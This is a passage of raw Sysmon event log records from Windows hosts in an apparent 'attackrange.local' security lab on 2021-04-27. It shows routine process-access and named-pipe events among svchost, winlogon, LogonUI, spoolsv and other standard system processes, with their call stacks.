12:24:42.624{BEA10069-D0C2-6086-1400-00000000BB01}3681636C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291945Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.624{BEA10069-D0C2-6086-1400-00000000BB01}3681636C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291944Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.624{BEA10069-D0C2-6086-1400-00000000BB01}3681636C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291943Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.624{BEA10069-D0C2-6086-1400-00000000BB01}3681636C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291942Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.624{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1700-00000000BB01}1348C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291941Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.624{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1100-00000000BB01}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+6260e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000291940Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.624{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-0F00-00000000BB01}936C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+625bd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 18141800x8000000000000000291939Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-ConnectPipe2021-04-27 12:24:42.624{BEA10069-D0C2-6086-0F00-00000000BB01}936\TSVCPIPE-e0582208-0b1b-4d6e-9177-8dab2eb6ce38C:\Windows\System32\svchost.exe 10341000x8000000000000000291938Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.624{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1100-00000000BB01}1012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291937Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.624{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1100-00000000BB01}1012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291936Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.624{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1100-00000000BB01}1012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x8000000000000000291935Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-ConnectPipe2021-04-27 12:24:42.592{BEA10069-D0C2-6086-0F00-00000000BB01}936\TSVCPIPE-e0582208-0b1b-4d6e-9177-8dab2eb6ce38C:\Windows\System32\svchost.exe 10341000x8000000000000000440651Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.223{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440650Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.223{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x8000000000000000291934Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-ConnectPipe2021-04-27 12:24:42.577{BEA10069-D0C2-6086-0F00-00000000BB01}936\TSVCPIPE-e0582208-0b1b-4d6e-9177-8dab2eb6ce38C:\Windows\System32\svchost.exe 10341000x8000000000000000291933Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.577{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1100-00000000BB01}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+6260e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000291932Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.577{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-0F00-00000000BB01}936C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+625bd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 18141800x8000000000000000291931Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-ConnectPipe2021-04-27 12:24:42.577{BEA10069-D0C2-6086-0F00-00000000BB01}936\TSVCPIPE-e0582208-0b1b-4d6e-9177-8dab2eb6ce38C:\Windows\System32\svchost.exe 17141700x8000000000000000291930Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-CreatePipe2021-04-27 12:24:42.577{BEA10069-D0C2-6086-0F00-00000000BB01}936\TSVCPIPE-e0582208-0b1b-4d6e-9177-8dab2eb6ce38C:\Windows\System32\svchost.exe 10341000x8000000000000000291929Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.577{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1100-00000000BB01}1012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291928Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.577{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1100-00000000BB01}1012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291927Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.577{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1900-00000000BB01}1844C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291926Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.577{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291925Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.577{BEA10069-D0C2-6086-0F00-00000000BB01}9365904C:\Windows\System32\svchost.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\termsrv.dll+a1087|c:\windows\system32\termsrv.dll+6a73d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291924Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.577{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1500-00000000BB01}1104C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291923Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.577{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1500-00000000BB01}1104C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291922Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.577{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1500-00000000BB01}1104C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291921Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.577{BEA10069-D0C2-6086-1000-00000000BB01}9447116C:\Windows\system32\svchost.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x147aC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\themeservice.dll+3de3|c:\windows\system32\themeservice.dll+26c0|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291920Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.577{BEA10069-D0C2-6086-1000-00000000BB01}9441148C:\Windows\system32\svchost.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291919Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.577{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291918Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 